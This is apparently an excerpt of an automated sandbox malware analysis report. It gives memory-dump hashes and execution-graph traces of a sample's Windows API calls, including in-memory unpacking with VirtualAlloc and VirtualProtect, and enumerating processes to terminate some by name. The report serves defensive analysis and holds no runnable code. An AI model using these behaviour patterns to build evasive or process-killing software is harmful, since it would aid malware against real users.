                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: CallTranslator
                                    • String ID: MOC$RCC
                                    • API String ID: 3163161869-2084237596
                                    • Opcode ID: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
                                    • Instruction ID: 11b07d04d3d9d4302f13809797fc0d929ae68548e3c897718611b6658021d6ae
                                    • Opcode Fuzzy Hash: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
                                    • Instruction Fuzzy Hash: 39718E30528B488FD768EF18C446BAAB7E0FF99314F144A5EE48AC7251DB74A5D1CB82
                                    APIs
                                    • __except_validate_context_record.LIBVCRUNTIME ref: 032D28B0
                                    • _CreateFrameInfo.LIBVCRUNTIME ref: 032D28D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: CreateFrameInfo__except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 2558813199-1018135373
                                    • Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                    • Instruction ID: 5b365d535ffdf2f255a11d14432baf8e7f242df58cb3b8236db549556c06c5bb
                                    • Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                    • Instruction Fuzzy Hash: FD51AAB4528B449FC760EF2CC18966A77E1FB89351F10095ED48EC7261DB70E882CB83

                                    Execution Graph

                                    Execution Coverage:59.2%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:11
                                    Total number of Limit Nodes:1
                                    execution_graph 89 2c30650 90 2c30665 89->90 95 2c30620 VirtualAlloc 90->95 92 2c306d0 96 2c301b0 VirtualAlloc 92->96 95->92 97 2c3023b VirtualProtect 96->97 99 2c30321 VirtualFree 97->99 102 2c3030c 97->102 100 2c30347 VirtualFree VirtualAlloc 99->100 100->102 101 2c30531 102->101 103 2c304f9 VirtualProtect 102->103 103->102

                                    Callgraph

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2527707074.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_2c30000_file.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFreeProtect
                                    • String ID:
                                    • API String ID: 267585107-0
                                    • Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                    • Instruction ID: 70586b82389ab0cfea8752151eb0703158240165f98089e7110fa4395dbc2eb9
                                    • Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                    • Instruction Fuzzy Hash: EDC1DA3021CA488FD785EF5CC498B6AB7E1FB98315F50585DF48AC7261DBB4E981CB06

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 34 2c30620-2c30644 VirtualAlloc
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2527707074.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_2c30000_file.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                    • Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
                                    • Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                    • Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

                                    Execution Graph

                                    Execution Coverage:6.3%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:8.2%
                                    Total number of Nodes:1683
                                    Total number of Limit Nodes:8
7ff7e3ce1bcc 10274->10276 10277 7ff7e3ce14e2 6 API calls 10275->10277 10278 7ff7e3ce14e2 6 API calls 10276->10278 10279 7ff7e3ce1bd1 10276->10279 10277->10279 10278->10279 9722 7ff7e3cec4b9 9725 7ff7e3cec4c7 9722->9725 9723 7ff7e3cec50e 9739 7ff7e3ceb9b0 9723->9739 9724 7ff7e3cec4fe 9731 7ff7e3cebbb4 9724->9731 9725->9723 9725->9724 9728 7ff7e3ceca67 9729 7ff7e3cec382 9729->9728 9730 7ff7e3ceb3e7 fputc 9729->9730 9730->9729 9732 7ff7e3cebbe6 9731->9732 9733 7ff7e3cebd06 9732->9733 9747 7ff7e3ceb3e7 9732->9747 9734 7ff7e3ceb3e7 fputc 9733->9734 9738 7ff7e3cebd86 9733->9738 9734->9733 9735 7ff7e3cebda2 9735->9729 9736 7ff7e3ceb3e7 fputc 9736->9738 9738->9735 9738->9736 9740 7ff7e3ceba02 9739->9740 9741 7ff7e3cebb66 9740->9741 9743 7ff7e3ceb3e7 fputc 9740->9743 9742 7ff7e3cebb7f 9741->9742 9744 7ff7e3ceb3e7 fputc 9741->9744 9745 7ff7e3cebba6 9742->9745 9746 7ff7e3ceb3e7 fputc 9742->9746 9743->9740 9744->9741 9745->9729 9746->9742 9748 7ff7e3ceb3f8 9747->9748 9749 7ff7e3ceb410 9748->9749 9750 7ff7e3ceb409 fputc 9748->9750 9749->9732 9750->9749 11181 7ff7e3cf05b9 UnlockFileEx 9751 7ff7e3cedc75 9752 7ff7e3cedccd 9751->9752 9753 7ff7e3cedc8a 9751->9753 9754 7ff7e3cecfc8 strlen 9752->9754 9755 7ff7e3cedcb4 wcslen 9753->9755 9757 7ff7e3cedcad 9753->9757 9756 7ff7e3cedb86 9754->9756 9755->9757 9759 7ff7e3cee2e0 9756->9759 9762 7ff7e3ceccd9 fputwc fwprintf 9756->9762 9758 7ff7e3ceccd9 2 API calls 9757->9758 9758->9756 9760 7ff7e3cee301 9759->9760 9761 7ff7e3ceccd9 2 API calls 9759->9761 9761->9760 9762->9756 10280 7ff7e3ce6776 10281 7ff7e3ce678c 10280->10281 10282 7ff7e3ce67fb 10280->10282 10284 7ff7e3ce6795 10281->10284 10285 7ff7e3ce682e 10281->10285 10283 7ff7e3ce14e2 6 API calls 10282->10283 10300 7ff7e3ce6824 10283->10300 10287 7ff7e3ce685e 10284->10287 10288 7ff7e3ce679e 10284->10288 10286 7ff7e3ce14e2 6 API calls 10285->10286 10286->10300 10289 7ff7e3ce14e2 6 API calls 10287->10289 10290 7ff7e3ce688e 10288->10290 10291 7ff7e3ce67aa ExpandEnvironmentStringsA 
10288->10291 10289->10300 10292 7ff7e3ce14e2 6 API calls 10290->10292 10293 7ff7e3ce67bb 10291->10293 10294 7ff7e3ce6909 GetLastError 10291->10294 10292->10300 10297 7ff7e3ce69dc 10293->10297 10298 7ff7e3ce67c9 10293->10298 10296 7ff7e3ce14e2 6 API calls 10294->10296 10295 7ff7e3ce6a51 10296->10300 10301 7ff7e3ce14e2 6 API calls 10297->10301 10302 7ff7e3ce14e2 6 API calls 10298->10302 10299 7ff7e3ce14e2 6 API calls 10303 7ff7e3ce67f1 10299->10303 10300->10295 10300->10299 10301->10300 10302->10303 9763 7ff7e3cea072 9764 7ff7e3cea0b6 9763->9764 9765 7ff7e3cea08c 9763->9765 9767 7ff7e3ce14e2 6 API calls 9764->9767 9769 7ff7e3ce9f70 9765->9769 9768 7ff7e3cea0a3 9767->9768 9770 7ff7e3ce9f9b 9769->9770 9771 7ff7e3ce9fd7 9769->9771 9772 7ff7e3ce9ed0 8 API calls 9770->9772 9773 7ff7e3ce14e2 6 API calls 9771->9773 9774 7ff7e3ce9fae 9772->9774 9780 7ff7e3ce9fb4 9773->9780 9775 7ff7e3cea007 _errno 9774->9775 9774->9780 9776 7ff7e3cf0560 9775->9776 9777 7ff7e3cea029 _errno 9776->9777 9778 7ff7e3cea034 _errno 9777->9778 9777->9780 9779 7ff7e3ce14e2 6 API calls 9778->9779 9779->9780 9780->9768 11182 7ff7e3ce2d71 11183 7ff7e3ce2f1c 11182->11183 11184 7ff7e3ce2f2d 11183->11184 11185 7ff7e3ce2f27 CloseHandle 11183->11185 11186 7ff7e3ce2f36 11184->11186 11188 7ff7e3ce29db 11184->11188 11185->11184 11187 7ff7e3ce14e2 6 API calls 11186->11187 11189 7ff7e3ce2a3c 11186->11189 11187->11189 11188->11189 11190 7ff7e3ce14e2 6 API calls 11188->11190 11190->11189 10524 7ff7e3cea66c 10525 7ff7e3cea67e 10524->10525 10527 7ff7e3cea693 10525->10527 10528 7ff7e3ceaebd 10525->10528 10529 7ff7e3ceaecb 10528->10529 10530 7ff7e3ceaed3 10528->10530 10529->10530 10531 7ff7e3ceaee1 10529->10531 10532 7ff7e3ceaed1 10529->10532 10530->10527 10531->10530 10533 7ff7e3ceaeeb InitializeCriticalSection 10531->10533 10532->10530 10534 7ff7e3ceaf29 free 10532->10534 10535 7ff7e3ceaf37 DeleteCriticalSection 10532->10535 10533->10530 10534->10532 10535->10530 10313 7ff7e3cea369 10314 7ff7e3cea3a7 10313->10314 
10315 7ff7e3cea378 10313->10315 10317 7ff7e3ce14e2 6 API calls 10314->10317 10319 7ff7e3cea264 10315->10319 10318 7ff7e3cea390 10317->10318 10320 7ff7e3cea286 10319->10320 10321 7ff7e3cea2c9 10319->10321 10323 7ff7e3ce9ed0 8 API calls 10320->10323 10322 7ff7e3ce14e2 6 API calls 10321->10322 10324 7ff7e3cea29f 10322->10324 10325 7ff7e3cea299 10323->10325 10324->10318 10325->10324 10326 7ff7e3cea2f9 _errno _strtoui64 _errno 10325->10326 10326->10324 10327 7ff7e3cea32c _errno 10326->10327 10328 7ff7e3ce14e2 6 API calls 10327->10328 10328->10324 9850 7ff7e3ce4c69 9851 7ff7e3ce4be8 9850->9851 9852 7ff7e3ce4d5a 9851->9852 9854 7ff7e3ce4c0a 9851->9854 9853 7ff7e3ce14e2 6 API calls 9852->9853 9855 7ff7e3ce4d7c 9853->9855 9856 7ff7e3ce14e2 6 API calls 9854->9856 9855->9855 9857 7ff7e3ce4c20 9856->9857 10338 7ff7e3ce3b64 10339 7ff7e3ce3bc1 10338->10339 10340 7ff7e3ce3b8a 10338->10340 10343 7ff7e3ce14e2 6 API calls 10339->10343 10341 7ff7e3ce3b8f 10340->10341 10342 7ff7e3ce3bec 10340->10342 10357 7ff7e3ce3909 10341->10357 10345 7ff7e3ce14e2 6 API calls 10342->10345 10350 7ff7e3ce3bb9 10343->10350 10345->10350 10347 7ff7e3ce3ba2 SetFileAttributesA 10348 7ff7e3ce3c3e GetLastError 10347->10348 10347->10350 10349 7ff7e3ce14e2 6 API calls 10348->10349 10349->10350 10350->10348 10351 7ff7e3ce3c6a 10350->10351 10352 7ff7e3ce3d02 10351->10352 10353 7ff7e3ce3d7d 10351->10353 10356 7ff7e3ce14e2 6 API calls 10352->10356 10354 7ff7e3ce14e2 6 API calls 10353->10354 10355 7ff7e3ce3d30 10354->10355 10356->10355 10358 7ff7e3ce3921 10357->10358 10359 7ff7e3ce3998 10357->10359 10361 7ff7e3ce39d1 10358->10361 10362 7ff7e3ce392a GetFileAttributesA 10358->10362 10360 7ff7e3ce14e2 6 API calls 10359->10360 10366 7ff7e3ce393b 10360->10366 10363 7ff7e3ce14e2 6 API calls 10361->10363 10364 7ff7e3ce3a0a GetLastError 10362->10364 10362->10366 10363->10366 10365 7ff7e3ce14e2 6 API calls 10364->10365 10365->10366 10368 7ff7e3ce3974 10366->10368 10369 7ff7e3ce3b3a 10366->10369 10367 7ff7e3ce14e2 6 API 
calls 10370 7ff7e3ce3b5f 10367->10370 10371 7ff7e3ce14e2 6 API calls 10368->10371 10369->10367 10370->10370 10372 7ff7e3ce398a 10371->10372 10372->10347 10372->10350 9858 7ff7e3ce3c63 9859 7ff7e3ce3cec 9858->9859 9860 7ff7e3ce3d7d 9859->9860 9863 7ff7e3ce3d02 9859->9863 9861 7ff7e3ce14e2 6 API calls 9860->9861 9862 7ff7e3ce3d30 9861->9862 9864 7ff7e3ce14e2 6 API calls 9863->9864 9864->9862 9865 7ff7e3ce2463 9866 7ff7e3ce2484 CloseHandle 9865->9866 9886 7ff7e3ce23f0 9866->9886 9867 7ff7e3ce26ed Process32Next 9869 7ff7e3ce2704 GetLastError 9867->9869 9867->9886 9868 7ff7e3ce2888 CloseHandle 9871 7ff7e3ce21e4 9868->9871 9872 7ff7e3ce28a3 9868->9872 9869->9886 9871->9872 9874 7ff7e3ce21f4 9871->9874 9879 7ff7e3ce14e2 6 API calls 9872->9879 9873 7ff7e3ce14e2 6 API calls 9873->9886 9880 7ff7e3ce14e2 6 API calls 9874->9880 9875 7ff7e3ce24d3 OpenProcess 9877 7ff7e3ce24f4 TerminateProcess 9875->9877 9878 7ff7e3ce25a3 GetLastError 9875->9878 9876 7ff7e3ce24c2 strcmp 9876->9875 9876->9886 9877->9866 9881 7ff7e3ce250a GetLastError 9877->9881 9882 7ff7e3ce14e2 6 API calls 9878->9882 9883 7ff7e3ce2211 9879->9883 9880->9883 9884 7ff7e3ce14e2 6 API calls 9881->9884 9882->9886 9884->9886 9885 7ff7e3ce254b 9886->9866 9886->9867 9886->9868 9886->9873 9886->9875 9886->9876 9886->9885 11191 7ff7e3ce1d60 11192 7ff7e3ce1e23 11191->11192 11193 7ff7e3ce1d77 11191->11193 11194 7ff7e3ce14e2 6 API calls 11192->11194 11195 7ff7e3ce1e53 11193->11195 11196 7ff7e3ce1d80 OpenProcessToken 11193->11196 11217 7ff7e3ce1e21 11194->11217 11197 7ff7e3ce14e2 6 API calls 11195->11197 11198 7ff7e3ce1eb8 GetLastError 11196->11198 11199 7ff7e3ce1d98 GetTokenInformation 11196->11199 11197->11217 11202 7ff7e3ce14e2 6 API calls 11198->11202 11200 7ff7e3ce1fcd 11199->11200 11201 7ff7e3ce1dce GetLastError 11199->11201 11203 7ff7e3ce2090 LocalAlloc 11200->11203 11208 7ff7e3ce20cb 11200->11208 11204 7ff7e3ce1de0 11201->11204 11205 7ff7e3ce1f67 LocalAlloc 11201->11205 11202->11217 11203->11208 11209 7ff7e3ce20a8 
GetLengthSid memcpy 11203->11209 11210 7ff7e3ce14e2 6 API calls 11204->11210 11206 7ff7e3ce1f82 GetTokenInformation 11205->11206 11205->11208 11206->11203 11212 7ff7e3ce1fac GetLastError 11206->11212 11207 7ff7e3ce14e2 6 API calls 11213 7ff7e3ce1ead 11207->11213 11209->11208 11211 7ff7e3ce1df6 11210->11211 11214 7ff7e3ce1e05 LocalFree 11211->11214 11215 7ff7e3ce1e0e CloseHandle 11211->11215 11216 7ff7e3ce14e2 6 API calls 11212->11216 11214->11215 11215->11213 11215->11217 11216->11200 11217->11207 11218 7ff7e3ce6d60 11219 7ff7e3ce6d6f 11218->11219 11220 7ff7e3ce6d82 11218->11220 11221 7ff7e3ce6d74 11219->11221 11222 7ff7e3ce6db5 11219->11222 11223 7ff7e3ce14e2 6 API calls 11220->11223 11224 7ff7e3ce6d79 11221->11224 11226 7ff7e3ce14e2 6 API calls 11221->11226 11225 7ff7e3ce14e2 6 API calls 11222->11225 11223->11224 11225->11224 11226->11224 9887 7ff7e3ce385c 9888 7ff7e3ce3869 9887->9888 9896 7ff7e3ce38a9 9887->9896 9890 7ff7e3ce1cf4 8 API calls 9888->9890 9889 7ff7e3ce14e2 6 API calls 9891 7ff7e3ce38ce 9889->9891 9892 7ff7e3ce3875 9890->9892 9892->9891 9893 7ff7e3ce1c73 8 API calls 9892->9893 9894 7ff7e3ce3889 9893->9894 9894->9891 9895 7ff7e3ce38d8 GetLastError 9894->9895 9894->9896 9897 7ff7e3ce14e2 6 API calls 9895->9897 9896->9889 9897->9891 10373 7ff7e3ce475d 10374 7ff7e3ce4b28 10373->10374 10375 7ff7e3ce4b35 10374->10375 10376 7ff7e3ce4b2d fclose 10374->10376 10377 7ff7e3ce4ba2 10375->10377 10378 7ff7e3ce4b39 10375->10378 10376->10375 10379 7ff7e3ce14e2 6 API calls 10377->10379 10381 7ff7e3ce14e2 6 API calls 10378->10381 10380 7ff7e3ce4b78 10379->10380 10381->10380 11255 7ff7e3cedd5c 11256 7ff7e3cedd6e 11255->11256 11257 7ff7e3ced3c1 fputwc 11256->11257 11261 7ff7e3cedb86 11257->11261 11258 7ff7e3cee2e0 11259 7ff7e3cee301 11258->11259 11260 7ff7e3ceccd9 2 API calls 11258->11260 11260->11259 11261->11258 11262 7ff7e3ceccd9 fputwc fwprintf 11261->11262 11262->11261 10536 7ff7e3cede59 10537 7ff7e3cede6f 10536->10537 10544 7ff7e3ced9bb 10537->10544 10539 
7ff7e3cee2e0 10540 7ff7e3cee301 10539->10540 10541 7ff7e3ceccd9 2 API calls 10539->10541 10541->10540 10542 7ff7e3cedb86 10542->10539 10543 7ff7e3ceccd9 fputwc fwprintf 10542->10543 10543->10542 10545 7ff7e3ced9cd 10544->10545 10562 7ff7e3ced00f 10545->10562 10548 7ff7e3ceda1a 10566 7ff7e3cecc00 10548->10566 10549 7ff7e3ceda9d 10553 7ff7e3cedaa1 10549->10553 10554 7ff7e3cedaa8 strlen 10549->10554 10550 7ff7e3ceda2c 10550->10549 10552 7ff7e3ceda42 10550->10552 10555 7ff7e3ceda46 10552->10555 10556 7ff7e3ceda4e strlen 10552->10556 10590 7ff7e3ced897 10553->10590 10554->10553 10570 7ff7e3cecdd0 10555->10570 10556->10555 10558 7ff7e3ceda27 10558->10542 10560 7ff7e3ceda81 10560->10558 10561 7ff7e3ceca90 fputwc 10560->10561 10561->10560 10563 7ff7e3ced02d 10562->10563 10596 7ff7e3cee4e0 10563->10596 10567 7ff7e3cecc16 10566->10567 10567->10567 10568 7ff7e3cecacd 10 API calls 10567->10568 10569 7ff7e3cecc6c 10568->10569 10569->10558 10571 7ff7e3cecdec 10570->10571 10572 7ff7e3cece3d 10571->10572 10575 7ff7e3ceca90 fputwc 10571->10575 10573 7ff7e3ceca90 fputwc 10572->10573 10577 7ff7e3ceceda 10572->10577 10573->10577 10574 7ff7e3cecee0 10576 7ff7e3cecee9 10574->10576 10582 7ff7e3cecf16 10574->10582 10575->10571 10578 7ff7e3ceca90 fputwc 10576->10578 10577->10574 10579 7ff7e3ceca90 fputwc 10577->10579 10581 7ff7e3cecf6b 10578->10581 10579->10577 10580 7ff7e3ceca90 fputwc 10580->10582 10583 7ff7e3cecf7f 10581->10583 10728 7ff7e3cecc72 10581->10728 10582->10580 10582->10581 10586 7ff7e3ceccd9 2 API calls 10582->10586 10587 7ff7e3ceca90 fputwc 10583->10587 10589 7ff7e3cecf97 10583->10589 10585 7ff7e3cecfbf 10585->10560 10586->10582 10587->10583 10588 7ff7e3ceca90 fputwc 10588->10589 10589->10585 10589->10588 10591 7ff7e3ced8b9 10590->10591 10592 7ff7e3cecdd0 9 API calls 10591->10592 10593 7ff7e3ced904 10592->10593 10594 7ff7e3ceca90 fputwc 10593->10594 10595 7ff7e3ced925 10594->10595 10597 7ff7e3cee556 10596->10597 10598 7ff7e3cee6b4 10597->10598 10613 7ff7e3ced120 
10597->10613 10660 7ff7e3cef663 10597->10660 10671 7ff7e3cee34c 10598->10671 10601 7ff7e3cee5ee 10602 7ff7e3cee6ac 10601->10602 10604 7ff7e3cee6e0 10601->10604 10667 7ff7e3cef717 10602->10667 10674 7ff7e3cee320 10604->10674 10606 7ff7e3ceed9f 10607 7ff7e3ceee37 10606->10607 10630 7ff7e3ceee18 10606->10630 10681 7ff7e3cef949 10606->10681 10608 7ff7e3cef803 6 API calls 10607->10608 10610 7ff7e3ceee44 10608->10610 10617 7ff7e3cef949 6 API calls 10610->10617 10625 7ff7e3ceee5c 10610->10625 10611 7ff7e3cef717 4 API calls 10611->10613 10613->10548 10613->10550 10615 7ff7e3cef717 4 API calls 10623 7ff7e3cef3c7 10615->10623 10616 7ff7e3cef949 6 API calls 10616->10607 10617->10625 10619 7ff7e3ceeaae 10619->10611 10621 7ff7e3cef3de 10624 7ff7e3cef717 4 API calls 10621->10624 10622 7ff7e3ceee0b 10627 7ff7e3cef717 4 API calls 10622->10627 10623->10619 10623->10621 10628 7ff7e3cef717 4 API calls 10623->10628 10624->10619 10626 7ff7e3ceeee9 10625->10626 10700 7ff7e3cefa57 10625->10700 10631 7ff7e3cefa57 6 API calls 10626->10631 10636 7ff7e3ceef05 10626->10636 10627->10630 10628->10621 10630->10607 10630->10616 10631->10636 10632 7ff7e3ceef22 10633 7ff7e3ceefdb 10632->10633 10634 7ff7e3ceef6e 10632->10634 10635 7ff7e3ceefe6 10633->10635 10642 7ff7e3cef2cd 10633->10642 10639 7ff7e3cef763 6 API calls 10634->10639 10655 7ff7e3ceebc1 10634->10655 10637 7ff7e3ceeff7 10635->10637 10640 7ff7e3cefa57 6 API calls 10635->10640 10636->10632 10706 7ff7e3cef763 10636->10706 10643 7ff7e3cef663 6 API calls 10637->10643 10656 7ff7e3cef030 10637->10656 10639->10655 10640->10637 10644 7ff7e3cef321 10642->10644 10647 7ff7e3cef763 6 API calls 10642->10647 10645 7ff7e3cef00e 10643->10645 10649 7ff7e3cefa57 6 API calls 10644->10649 10644->10655 10648 7ff7e3cefa57 6 API calls 10645->10648 10646 7ff7e3cef763 6 API calls 10646->10632 10647->10642 10648->10656 10649->10655 10651 7ff7e3cef717 4 API calls 10651->10656 10652 7ff7e3cef119 10653 7ff7e3cef1b4 10652->10653 10659 7ff7e3cef134 10652->10659 10654 
7ff7e3cefa57 6 API calls 10653->10654 10653->10655 10654->10655 10655->10615 10655->10619 10656->10644 10656->10651 10656->10652 10656->10655 10658 7ff7e3cef763 6 API calls 10656->10658 10712 7ff7e3cefb9a 10656->10712 10657 7ff7e3cef763 6 API calls 10657->10659 10658->10656 10659->10655 10659->10657 10719 7ff7e3cef560 10660->10719 10663 7ff7e3cef68b 10725 7ff7e3cef605 10663->10725 10664 7ff7e3cef6ec malloc 10664->10663 10665 7ff7e3cef706 10664->10665 10665->10601 10668 7ff7e3cef724 10667->10668 10669 7ff7e3cef73b 10667->10669 10670 7ff7e3cef560 4 API calls 10668->10670 10669->10598 10670->10669 10672 7ff7e3cee320 6 API calls 10671->10672 10673 7ff7e3cee360 10672->10673 10673->10613 10675 7ff7e3cee32c 10674->10675 10676 7ff7e3cef663 6 API calls 10675->10676 10677 7ff7e3cee340 10676->10677 10677->10606 10677->10619 10677->10655 10678 7ff7e3cef803 10677->10678 10679 7ff7e3cef663 6 API calls 10678->10679 10680 7ff7e3cef814 10679->10680 10680->10606 10682 7ff7e3cef973 10681->10682 10683 7ff7e3cef95d 10681->10683 10684 7ff7e3ceedfd 10682->10684 10686 7ff7e3cef560 4 API calls 10682->10686 10693 7ff7e3cef9d6 10682->10693 10685 7ff7e3cef763 6 API calls 10683->10685 10696 7ff7e3cef829 10684->10696 10685->10682 10687 7ff7e3cef99e 10686->10687 10688 7ff7e3cef9b4 10687->10688 10689 7ff7e3cef803 6 API calls 10687->10689 10688->10684 10691 7ff7e3cef605 LeaveCriticalSection 10688->10691 10689->10688 10690 7ff7e3cef560 4 API calls 10690->10693 10691->10693 10692 7ff7e3cef717 4 API calls 10692->10693 10693->10684 10693->10690 10693->10692 10694 7ff7e3cef829 6 API calls 10693->10694 10695 7ff7e3cef605 LeaveCriticalSection 10693->10695 10694->10693 10695->10693 10697 7ff7e3cef847 10696->10697 10698 7ff7e3cef663 6 API calls 10697->10698 10699 7ff7e3cef866 10698->10699 10699->10622 10699->10699 10701 7ff7e3cefa80 10700->10701 10702 7ff7e3cef663 6 API calls 10701->10702 10704 7ff7e3cefa90 10702->10704 10703 7ff7e3cefb42 10703->10626 10704->10703 10705 7ff7e3cef717 4 API calls 
10704->10705 10705->10703 10708 7ff7e3cef77e 10706->10708 10707 7ff7e3ceef43 10707->10632 10707->10646 10708->10707 10709 7ff7e3cef663 6 API calls 10708->10709 10710 7ff7e3cef7b5 10709->10710 10710->10707 10711 7ff7e3cef717 4 API calls 10710->10711 10711->10707 10713 7ff7e3cefbaf 10712->10713 10714 7ff7e3cefbb3 10713->10714 10715 7ff7e3cefbd0 10713->10715 10716 7ff7e3cef663 6 API calls 10714->10716 10717 7ff7e3cef663 6 API calls 10715->10717 10718 7ff7e3cefbba 10716->10718 10717->10718 10718->10656 10720 7ff7e3cef573 EnterCriticalSection 10719->10720 10723 7ff7e3cef591 10719->10723 10720->10723 10721 7ff7e3cef5a4 InitializeCriticalSection InitializeCriticalSection 10721->10723 10722 7ff7e3cef5ec Sleep 10722->10723 10723->10720 10723->10721 10723->10722 10724 7ff7e3cef5fe 10723->10724 10724->10663 10724->10664 10726 7ff7e3cef625 10725->10726 10727 7ff7e3cef60e LeaveCriticalSection 10725->10727 10726->10665 10727->10726 10729 7ff7e3cecc80 localeconv 10728->10729 10730 7ff7e3ceccae 10728->10730 10731 7ff7e3cf026c 6 API calls 10729->10731 10731->10730 11263 7ff7e3cec958 11264 7ff7e3cec960 localeconv 11263->11264 11267 7ff7e3cec382 11263->11267 11265 7ff7e3cf026c 6 API calls 11264->11265 11265->11267 11266 7ff7e3ceca67 11267->11266 11268 7ff7e3ceb3e7 fputc 11267->11268 11268->11267 9898 7ff7e3ceac96 9899 7ff7e3cead13 signal 9898->9899 9901 7ff7e3ceaca1 9898->9901 9900 7ff7e3cead25 signal 9899->9900 9899->9901 9900->9901 9902 7ff7e3ce7096 9903 7ff7e3ce70b2 strlen 9902->9903 9904 7ff7e3ce70c7 9902->9904 9903->9904 10740 7ff7e3cede8a 10743 7ff7e3cedea6 10740->10743 10741 7ff7e3cecc00 10 API calls 10750 7ff7e3cedb86 10741->10750 10742 7ff7e3cedf1c 10742->10741 10743->10742 10744 7ff7e3cedf21 10743->10744 10751 7ff7e3ced5bc 10744->10751 10746 7ff7e3cee2e0 10747 7ff7e3cee301 10746->10747 10748 7ff7e3ceccd9 2 API calls 10746->10748 10748->10747 10749 7ff7e3ceccd9 fputwc fwprintf 10749->10750 10750->10746 10750->10749 10755 7ff7e3ced5d3 10751->10755 10752 7ff7e3ceca90 fputwc 
10754 7ff7e3ced7aa 10752->10754 10753 7ff7e3ced76b 10753->10752 10753->10754 10756 7ff7e3ceca90 fputwc 10754->10756 10755->10753 10759 7ff7e3ceca90 fputwc 10755->10759 10757 7ff7e3ced7b7 10756->10757 10758 7ff7e3ceca90 fputwc 10757->10758 10761 7ff7e3ced7c8 10758->10761 10759->10755 10760 7ff7e3ced815 10764 7ff7e3ced861 10760->10764 10767 7ff7e3ceca90 fputwc 10760->10767 10762 7ff7e3ceca90 fputwc 10761->10762 10763 7ff7e3ced7ce 10761->10763 10762->10761 10763->10760 10765 7ff7e3cecc72 7 API calls 10763->10765 10766 7ff7e3ceca90 fputwc 10763->10766 10769 7ff7e3ceccd9 2 API calls 10763->10769 10768 7ff7e3ceca90 fputwc 10764->10768 10765->10763 10766->10763 10767->10760 10770 7ff7e3ced875 10768->10770 10769->10763 9931 7ff7e3cf0088 ___lc_codepage_func ___mb_cur_max_func 9932 7ff7e3cf00b7 9931->9932 9936 7ff7e3cf00f1 9931->9936 9935 7ff7e3cf00bc 9932->9935 9937 7ff7e3cf00c3 9932->9937 9933 7ff7e3ceffd0 2 API calls 9933->9935 9935->9933 9935->9936 9937->9936 9938 7ff7e3ceffd0 9937->9938 9939 7ff7e3cefff4 WideCharToMultiByte 9938->9939 9940 7ff7e3ceffe4 9938->9940 9939->9940 9941 7ff7e3cf0034 _errno 9939->9941 9940->9941 9942 7ff7e3ceffeb 9940->9942 9941->9942 9942->9937 10409 7ff7e3cf0781 BuildTrusteeWithSidW 11328 7ff7e3ce9181 11337 7ff7e3ce8e2e 11328->11337 11329 7ff7e3ce90f2 GetProcessHeap HeapFree 11329->11337 11330 7ff7e3ce8da0 11331 7ff7e3ce9284 11330->11331 11332 7ff7e3ce8da9 FreeLibrary 11330->11332 11332->11331 11333 7ff7e3cea1f1 11 API calls 11333->11337 11334 7ff7e3ce8ecc strlen 11334->11337 11335 7ff7e3ce8f64 GetProcessHeap HeapAlloc 11335->11337 11336 7ff7e3ce8fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 11336->11337 11337->11329 11337->11330 11337->11333 11337->11334 11337->11335 11337->11336 11338 7ff7e3ce795a 14 API calls 11337->11338 11339 7ff7e3ce91dc LocalFree 11337->11339 11340 7ff7e3ce14e2 6 API calls 11337->11340 11338->11337 11339->11337 11340->11337 9965 7ff7e3cec436 9966 7ff7e3cec48e 9965->9966 9967 7ff7e3cec44b 9965->9967 9968 7ff7e3ceb593 
